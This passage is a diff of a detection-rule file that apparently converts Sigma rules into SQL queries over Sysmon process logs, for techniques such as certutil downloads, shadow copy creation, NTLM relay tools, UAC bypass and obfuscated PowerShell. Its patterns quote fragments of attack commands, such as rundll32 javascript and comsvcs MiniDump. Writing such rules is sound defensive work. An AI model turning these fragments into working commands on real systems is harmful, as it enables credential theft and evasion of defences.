ESCAPE '\\' OR CommandLine LIKE '%/f%' ESCAPE '\\' OR CommandLine LIKE '%regsvr%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\odbcconf.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE'))))" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_odbcconf_susp_exec.yml" }, { - "title": "Suspicious CodePage Switch Via CHCP", - "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "title": "Shadow Copies Creation Using Operating Systems Utilities", + "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "status": "test", - "description": "Detects a code page switch in command line or batch scripts to a rare language", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.t1036", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Administrative activity (adjust code pages according to your organization's region)" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_chcp_codepage_switch.yml" + "filename": "proc_creation_win_susp_shadow_copies_creation.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", - "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LOLBIN Execution Of The FTP.EXE Binary", + "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "status": "test", + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.execution", + "attack.t1059", "attack.defense_evasion", - "attack.t1218" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" + "filename": "proc_creation_win_lolbin_ftp.yml" }, { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dinjector.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "Application Whitelisting Bypass via PresentationHost.exe", - "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "title": "Active Directory Structure Export Via Ldifde.EXE", + "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_presentationhost.yml" + "filename": "proc_creation_win_ldifde_export.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", - "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Active Directory Structure Export Via Csvde.EXE", + "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "status": "experimental", + "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.exfiltration" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_csvde_export.yml" }, { - "title": "Potential SMB Relay Attack Tool Execution", - "id": "5589ab4f-a767-433c-961d-c91f3f704db1", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Legitimate files with these rare hacktool names" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%PetitPotam%' ESCAPE '\\' OR Image LIKE '%RottenPotato%' ESCAPE '\\' OR Image LIKE '%HotPotato%' ESCAPE '\\' OR Image LIKE '%JuicyPotato%' ESCAPE '\\' OR Image LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR Image LIKE '%Juicy Potato%' ESCAPE '\\' OR Image LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((Image LIKE '%HotPotatoes6%' ESCAPE '\\' OR Image LIKE '%HotPotatoes7%' ESCAPE '\\' OR Image LIKE '%HotPotatoes %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", - "id": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "title": "Execute Files with Msdeploy.exe", + "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "status": "test", - "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", - "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "description": "Detects file execution using the msdeploy.exe lolbin", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.008" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of odbcconf.exe by legitimate user" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR OriginalFileName = 'odbcconf.exe') AND (CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%-f%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%/f%' ESCAPE '\\' OR CommandLine LIKE '%regsvr%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\odbcconf.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND Image LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_odbcconf_susp_exec.yml" + "filename": "proc_creation_win_lolbin_msdeploy.yml" }, { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", + "title": "Persistence Via TypedPaths - CommandLine", + "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" + "filename": "proc_creation_win_registry_typed_paths_persistence.yml" }, { - "title": "HackTool - winPEAS Execution", - "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", + "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "status": "experimental", - "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", - "author": "Georg Lauenstein (sure[secure])", + "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1082", - "attack.t1087", - "attack.t1046" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'winPEAS.exe' OR (Image LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_winpeas.yml" + "filename": "proc_creation_win_wmic_recon_hotfix.yml" }, { - "title": "Suspicious Mofcomp Execution", - "id": "1dd05363-104e-4b4a-b963-196a534b03a1", - "status": "experimental", - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution", - "attack.t1218" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mofcomp_execution.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", - "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "status": "test", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", - "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", - "status": "experimental", - "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", + "status": "test", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.persistence", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Installation of unsigned packages for testing purposes" + "False positives may occur if a user called rundll32 from CLI with no options" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Fireball Archer Install", - "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "status": "test", - "description": "Detects Archer malware invocation via rundll32", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1218.011" + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 